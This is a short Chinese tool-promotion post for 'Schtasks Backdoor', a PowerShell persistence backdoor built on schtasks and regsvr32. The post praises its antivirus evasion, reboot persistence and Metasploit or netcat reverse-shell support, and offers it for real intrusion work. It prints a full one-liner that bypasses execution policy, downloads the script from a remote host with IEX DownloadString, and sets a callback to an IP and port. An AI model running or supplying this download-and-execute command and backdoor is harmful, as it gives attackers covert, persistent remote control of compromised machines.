Schtasks Backdoor:权限维持工具

项目主页

https://github.com/re4lity/Schtasks-Backdoor

简介

一款权限维持后门PowerShell脚本

Author:xiaocheng 小城

Mail:passthru.bug@gmail.com

原理是:schtasks+regsvr32

作用

内网维持权限方法的一种。免杀效果好,重启生效。支持msf反弹,nc反弹,客户端不会用明显异常

自定义执行命令会有弹框(可以自己修改,思路可以使用mshta),一般实战中用nc或者msf。

使用方法

远程调用命令

powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://8.8.8.8/Invoke-taskBackdoor.ps1');Invoke-Tasksbackdoor -method msf -ip 8.8.8.8 -port 8081 -time 2"

对比之前我发的bitsadmin-backdoor-权限维持后门这个脚本的对比之前写的脚本优势就是不需要过uac权限。

Example:

example

原创文章,作者:SecToolkit,如若转载,请注明出处:http://www.mottoin.com/tools/90595.html

发表评论

登录后才能评论

联系我们

021-62666911

在线咨询:点击这里给我发消息

邮件:root@mottoin.com

工作时间:周一至周五,9:30-18:30,节假日休息

QR code